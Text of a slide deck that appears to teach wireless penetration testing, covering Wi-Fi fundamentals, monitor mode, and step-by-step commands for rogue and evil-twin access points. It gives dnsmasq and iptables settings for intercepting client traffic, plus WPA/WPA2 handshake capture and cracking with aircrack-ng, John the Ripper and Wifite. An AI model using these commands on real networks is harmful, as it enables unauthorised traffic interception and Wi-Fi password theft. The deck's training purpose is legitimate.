In this slides deck, we gonna look into Wireless penetration testing requirements like hardware & software, Various IEEE standards. and also deep dive into WEP, WPA, WPA2 & its Security threats & Security best practices.
4. Hardware of my choice for this session:
TL-WN722N Wi-Fi Adaptor
5. System Architecture
• Minimum System Configuration
• Windows 10 in Host Machine
• Machine Specification: 4GB to 8GB RAM, 100GB HDD or SSD, 2CPU
• Virtualisation Platform
• Virtual box (https://www.virtualbox.org/)
(or)
• VMware (https://www.vmware.com/in/products/workstation-
player/workstation-player-evaluation.html)
• OS needs to be installed inside VM
• Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
7. Wi-Fi Network Fundamentals
IEEE 802.11
• IEEE 802.11 is part of the IEEE 802 set of local area network (LAN)
technical standards, and specifies the set of media access control (MAC)
and physical layer (PHY) protocols for implementing wireless local area
network (WLAN) computer communication.
• The standard and amendments provide the basis for wireless network
products using the Wi-Fi brand and are the world's most widely used
wireless computer networking standards.
• IEEE 802.11 is used in most home and office networks to allow laptops,
printers, smartphones, and other devices to communicate with each other
and access the Internet without connecting wires. IEEE 802.11 is also a
basis for vehicle-based communication networks with IEEE 802.11p.
8. IEEE 802.11 (Contd.)
• The standards are created and maintained by the Institute of Electrical and
Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802).
• The base version of the standard was released in 1997 and has had subsequent
amendments. While each amendment is officially revoked when it is incorporated
in the latest version of the standard, the corporate world tends to market to the
revisions because they concisely denote the capabilities of their products.
• IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz,
5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications
list channels that might be used, the radio frequency spectrum availability
allowed varies significantly by regulatory domain.
• The protocols are typically used in conjunction with IEEE 802.2, and are designed
to interwork seamlessly with Ethernet, and are very often used to carry Internet
Protocol traffic.
14. Basic Terminologies(Contd.)
Access Point (AP)
• AP is a networking hardware device that allows other Wi-Fi devices to
connect to a wired network.
• As a standalone device, the AP may have a wired connection to a router,
but, in a wireless router, it can also be an integral component of the router
itself.
Service Set Identifier (SSID)
• A service set identifier (SSID) is a sequence of characters that uniquely
names a wireless local area network (WLAN).
• An SSID is sometimes referred to as a "network name" This name allows
stations to connect to the desired network when multiple independent
networks operate in the same physical area.
15. Basic Terminologies(Contd.)
Basic Service Set Identifier (BSSID)
• Its the MAC physical address of the access point or wireless router that is
used to connect to the Wi-Fi.
Extended Service Set Identifier (ESSID)
• It is a wireless network, created by multiple access points, which appears
to users as a single, seamless network, such as a network covering a home
or office that is too large for reliable coverage by a single access point.
Roaming
• Wi-Fi roaming occurs when a wireless client device moves outside the
usable range of one router or access point (AP) and connects to a
different one.
16. Basic Terminologies(Contd.)
Channel
• A Wi-Fi channel is the frequency at which your router sends out the
information to your device. Most routers and devices support several
bands for your Wi-Fi connection, most popular being 5 GHz and 2.4 GHz.
Each of these ranges gets divided into smaller slots that are channels.
Data Rate
• Data rates varying modulation types and number of spatial streams; 200
Mbps, 400 Mbps, 433 Mbps, 600 Mbps, 867 Mbps.
Beacon
• Wi-Fi beacons are relatively short, regular transmissions from access
points (APs) with a purpose to inform user devices (clients) about
available Wi-Fi services and near-by access points. Clients use beacons to
decide which AP with which to connect.
18. Wireless Operating modes (Contd.)
• Managed - Managed mode allows you to configure your laptop or desktop
system as an AP for providing connectivity to other wireless stations.
• Ad-hoc - Ad-hoc mode refers to a wireless network structure where
devices can communicate directly with each other. This type of wireless
network is also called peer-to-peer mode.
• Master - When your wireless card is in master mode it acts as an access
point and it actively transmits a signal
• Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode,
allows a computer with a wireless network interface controller (WNIC) to
monitor all traffic received on a wireless channel.
• Auto - the easiest way to configure a wireless interface and is enabled by
default
20. Monitor Mode
• Start the Kali OS in VMware or Virtual box
• Plug-in USB Tplink Wireless Adapter (TL-WN722N)
• Run following command
• iwconfig
21. Monitor Mode(Contd.)
• By default it will be in Auto or Managed mode
• Run following commands to switch to Monitor mode
• Airmon-ng start wlan0
• Airmon-ng check kill [if any previous processes are running do this]
• iwconfig
• To Disable monitor mode run airmon-ng stop wlan0
• Restart network manager – service network-manager start
35. Wardriving with Kismet (Just for reference)
• This can be achieved only, if we are moving or driving or roaming in a
vehicle from multiple location to capture Wi-Fi hotspots with GPS
Information.
• Hardware required - Car, Laptop, Android Phone, Wifi Adapter
• Software Required – Kismet, GPSD, ADB, Share GPS (AndroidApp),
Google Earth
• Reference blog link - https://veteransec.org/wifi-hacking-wardriving-
with-an-android-phone-and-raspberry-pi-3/
39. Creation of Rogue AP using Wi-Fi Pumpkin 3
• Plugin wireless adapter & It doesn’t required monitor mode enabled.
Run following commands
• Wifipumpkin3
• Set interface wlan0
• Set ssid hello
• Set proxy noproxy
• Start
• It will create an Rogue AP with Name
With name Hello
40. Creation of Rogue AP using Wi-Fi Pumpkin 3
(Contd.)
• Once any device is connected to Rogue AP “Hello” we can intercept
the traffic of connected clients easily. (Eviltwin attack)
41. Creation of Rogue AP using Air-ng tools
• Airodump-ng wlan0
• Airbase-ng -c 11 –e tplink –s –W 1 wlan0
• Airodump-ng –c 11 --bssid bssidoftplinknewlycreated –w 1 wlan0
• For Eviltwin/MITM attack we need DNSmasq
• airbase-ng -e TP-Link -c 8 wlan0 [create fake ap for eviltwinattack]
• at0 interface is created
geany /etc/dnsmasq.conf
interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
42. Creation of Rogue AP using Air-ng tools
(Contd.)
Run below commands in separate terminal
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect with any device now, we can see the traffic
54. Capture the WPA/WPA2 Handshake file
• Run the following commands:
• airmon-ng start wlan0 [Put the wireless adapter in Monitor mode]
• airodump-ng wlan0 [Listen to all the APs which are alive]
• airodump-ng -c 6 --bssid macaddrwpaAP -w wpacracking wlan0 [capture
wpacracking handshake file with airodump-ng]
• Do a Deauthentication attack manually by disconnection/connecting your
mobile device to that AP
• aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt
[Pass the wordlist with handshake file]
56. Cracking WPA/WPA2 using John the Ripper
• John --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout
| aircrack-ng -e tplink -w - wpacracking.cap
57. Cracking WPA/WPA2 using Wifite
• Wifite –wpa
• Before starting the
attack connect with
a client device
61. Security Best Practices
• Change default passwords
• Restrict access to authorized users
• Encrypt the data on your network
• Protect your Service Set Identifier (SSID)
• Install a firewall
• Maintain antivirus software
• Use file sharing with caution
• Keep your access point software patched and up to date
• Check your internet provider’s or router manufacturer’s wireless security options
• Connect using a Virtual Private Network (VPN)
Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003